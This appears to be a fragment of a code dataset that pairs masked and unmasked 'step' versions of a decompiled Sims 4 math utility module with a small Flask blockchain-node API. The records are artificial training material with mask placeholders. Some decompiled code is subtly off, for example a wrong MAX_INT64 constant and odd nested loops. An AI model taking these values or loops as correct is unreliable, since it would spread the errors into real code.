"step-4": "<mask token>\n\n\ndef clamp(lower_bound, x, upper_bound):\n if x < lower_bound:\n return lower_bound\n if x > upper_bound:\n return upper_bound\n return x\n\n\ndef interpolate(a, b, fraction):\n return a * fraction + (1 - fraction) * b\n\n\ndef linear_seq_gen(start, stop, step, max_count=None):\n delta = stop - start\n num = floor(abs(delta / step))\n if max_count is not None:\n num = min(num, max_count - 1)\n if num > 0:\n for i in range(0, num + 1):\n yield start + i * delta / num\n else:\n yield start\n if stop != start:\n yield stop\n\n\ndef deg_to_rad(deg):\n return deg * PI / 180\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\ndef vector_cross_2d(a, b):\n return a.z * b.x - a.x * b.z\n\n\ndef vector_normalize(v):\n return v / v.magnitude()\n\n\ndef vector_flatten(v):\n return Vector3(v.x, 0, v.z)\n\n\ndef almost_equal(a, b, epsilon=EPSILON):\n return abs(a - b) < epsilon\n\n\n<mask token>\n\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon\n ) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\ndef transform_almost_equal_2d(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal_2d(t1.translation, t2.translation, epsilon=\n epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef angle_to_yaw_quaternion(angle):\n return Quaternion.from_axis_angle(angle, UP_AXIS)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\ndef get_difference_transform(transform_a, transform_b):\n v = transform_b.translation - transform_a.translation\n a_q_i = invert_quaternion(transform_a.orientation)\n q = Quaternion.concatenate(transform_b.orientation, a_q_i)\n v_prime = Quaternion.transform_vector(a_q_i, v)\n return Transform(v_prime, q)\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-5": "from _math import Vector2, Vector3, Quaternion, Transform, Vector3Immutable, QuaternionImmutable, minimum_distance\nfrom _math import mod_2pi\nfrom math import pi as PI, sqrt, fmod, floor, atan2, acos, asin, ceil, pi, e\nimport operator\nfrom sims4.repr_utils import standard_repr\nimport enum\nimport native.animation\nimport sims4.hash_util\nfrom singletons import DEFAULT\nTWO_PI = PI*2\nEPSILON = 1.192092896e-07\nQUATERNION_EPSILON = 0.001\nMAX_FLOAT = 3.402823466e+38\nMAX_UINT64 = 18446744073709551615\nMAX_INT64 = 922337203685477580\nMAX_UINT32 = 4294967295\nMAX_INT32 = 2147483647\nMAX_UINT16 = 65535\nMAX_INT16 = 32767\nPOS_INFINITY = float('inf')\nNEG_INFINITY = float('-inf')\nFORWARD_AXIS = Vector3.Z_AXIS()\nUP_AXIS = Vector3.Y_AXIS()\n\ndef clamp(lower_bound, x, upper_bound):\n if x < lower_bound:\n return lower_bound\n if x > upper_bound:\n return upper_bound\n return x\n\ndef interpolate(a, b, fraction):\n return a*fraction + (1 - fraction)*b\n\ndef linear_seq_gen(start, stop, step, max_count=None):\n delta = stop - start\n num = floor(abs(delta/step))\n if max_count is not None:\n num = min(num, max_count - 1)\n if num > 0:\n for i in range(0, num + 1):\n yield start + i*delta/num\n else:\n yield start\n if stop != start:\n yield stop\n\ndef deg_to_rad(deg):\n return deg*PI/180\n\ndef rad_to_deg(rad):\n return rad*180/PI\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\ndef vector_dot(a, b):\n return a.x*b.x + a.y*b.y + a.z*b.z\n\ndef vector_dot_2d(a, b):\n return a.x*b.x + a.z*b.z\n\ndef vector_cross(a, b):\n return Vector3(a.y*b.z - a.z*b.y, a.z*b.x - a.x*b.z, a.x*b.y - a.y*b.x)\n\ndef vector_cross_2d(a, b):\n return a.z*b.x - a.x*b.z\n\ndef vector_normalize(v):\n return v/v.magnitude()\n\ndef vector_flatten(v):\n return Vector3(v.x, 0, v.z)\n\ndef almost_equal(a, b, epsilon=EPSILON):\n return abs(a - b) < epsilon\n\ndef vector3_almost_equal(v1, v2, epsilon=EPSILON):\n return abs(v1.x - v2.x) < epsilon and (abs(v1.y - v2.y) < epsilon and abs(v1.z - v2.z) < epsilon)\n\ndef vector3_almost_equal_2d(v1, v2, epsilon=EPSILON):\n return abs(v1.x - v2.x) < epsilon and abs(v1.z - v2.z) < epsilon\n\ndef quaternion_almost_equal(q1, q2, epsilon=QUATERNION_EPSILON):\n if abs(q1.x - q2.x) < epsilon and (abs(q1.y - q2.y) < epsilon and abs(q1.z - q2.z) < epsilon) and abs(q1.w - q2.w) < epsilon:\n return True\n if abs(q1.x + q2.x) < epsilon and (abs(q1.y + q2.y) < epsilon and abs(q1.z + q2.z) < epsilon) and abs(q1.w + q2.w) < epsilon:\n return True\n return False\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)\n\ndef transform_almost_equal_2d(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal_2d(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\ndef vector3_angle(v):\n return atan2(v.x, v.z)\n\ndef angle_to_yaw_quaternion(angle):\n return Quaternion.from_axis_angle(angle, UP_AXIS)\n\ndef yaw_quaternion_to_angle(q):\n if almost_equal(q.y, 0.0):\n return 0\n angle = acos(q.w)*2.0\n if q.y > 0:\n return angle\n return -angle\n\ndef get_closest_point_2D(segment, p):\n a1 = segment[0]\n a2 = segment[1]\n (x1, x2) = (a1.x, a2.x)\n x3 = p.x\n (z1, z2) = (a1.z, a2.z)\n z3 = p.z\n dx = x2 - x1\n dz = z2 - z1\n t = ((x3 - x1)*dx + (z3 - z1)*dz)/(dx*dx + dz*dz)\n t = sims4.math.clamp(0, t, 1)\n x0 = x1 + t*dx\n z0 = z1 + t*dz\n return Vector3(x0, p.y, z0)\n\ndef invert_quaternion(q):\n d = 1.0/(q.x*q.x + q.y*q.y + q.z*q.z + q.w*q.w)\n return Quaternion(-d*q.x, -d*q.y, -d*q.z, d*q.w)\n\ndef get_difference_transform(transform_a, transform_b):\n v = transform_b.translation - transform_a.translation\n a_q_i = invert_quaternion(transform_a.orientation)\n q = Quaternion.concatenate(transform_b.orientation, a_q_i)\n v_prime = Quaternion.transform_vector(a_q_i, v)\n return Transform(v_prime, q)\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref', 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None, joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface, parent=self.parent, joint_name_or_hash=self.joint_name_or_hash, slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform)\n joint_transform = native.animation.get_joint_transform_from_rig(self.parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform, parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform, joint_transform)\n return sims4.math.Transform.concatenate(local_transform, parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent, self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=DEFAULT, routing_surface=DEFAULT, parent=DEFAULT, joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent, joint_name_or_hash, slot_hash)\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = ('points',)\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0])/(p2[0] - p1[0])\n return (p2[1] - p1[1])*percent + p1[1]\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1]/max_y*weight) for point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end/total_length\n pivot_y_value = (self.points[0][1] - last_point[1])*distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\nwith InequalityOperator.__reload_context__(InequalityOperator, InequalityOperator):\n InequalityOperator.from_function = Operator.from_function\n InequalityOperator.function = Operator.function\n InequalityOperator.inverse = Operator.inverse\n InequalityOperator.symbol = Operator.symbol\n InequalityOperator.category = Operator.category\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = ('value', 'comparison')\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n\n",
"step-ids": [
52,
53,
55,
64,
75
]
}
|
[
52,
53,
55,
64,
75
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from app import Node
from dbm2 import filemanager
fm = filemanager()
node = Node(fm)
app = Flask(__name__)
@app.route("/transactions/isfull",methods=['GET'])
def isFull():
return jsonify(node.isFull()), 200
@app.route("/transactions/new",methods=["POST"])
def newTransaction():
transaction = request.get_json()
if node.isValidTxn(node.isValidChain(),transaction):
return transaction, 200
else:
return jsonify(False), 200
@app.route("/chain/last",methods=["GET"])
def last_block():
return jsonify(node.getLastBlock()), 200
@app.route("/chain",methods=["GET"])
def get_chain():
return jsonify(node.chain), 200
@app.route("/pnodes/register",methods=["POST"])
def register_pnodes():
nodes = request.get_json()
print(nodes)
if type(nodes)==list:
if len(nodes)>10 and nodes!=[]:
nodes = nodes[:10]
s = [] #succeed
f = [] #failed
for addr in nodes:
if node.addPNode(addr):
s.append(addr)
else:
f.append(addr)
resp = {"Added PNodes":s,
"Not added pnodes":f}
return jsonify(resp), 200
resp = {"Error":"Input format error"}
return jsonify(resp), 400
@app.route("/pnodes/size",methods=["GET"])
def pnodes_size():
return jsonify(len(node.pnodes)), 200
@app.route("/nodes",methods=["GET"])
def get_nodes():
nodes = list(node.nodes)
return jsonify(nodes), 200
@app.route("/nodes/resolve",methods=["GET"])
def resolve_nodes():
added_nodes = node.resolveNodes()
if added_nodes:
return jsonify(added_nodes), 200
else:
return "0 nodes added",400
@app.route("/chain/resolve",methods=["GET"])
def resolve_chain():
r = node.resolveConflicts()
if r:
return jsonify(r), 200
else:
print("Nothing")
return jsonify(r), 400
@app.route("/mine",methods=["GET"])
def mine():
mb = node.mine()
resp = {"Mined_block":mb}
return jsonify(resp), 200
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-p","--port",default=node.DEFAULT_PORT,type=int,help='port to listen on')
args = parser.parse_args()
port = args.port
node.port=port
app.run(host="",port=port)
|
normal
|
{
"blob_id": "45b46a08d8b304ac12baf34e0916b249b560418f",
"index": 7459,
"step-1": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\n<mask token>\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\n<mask token>\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
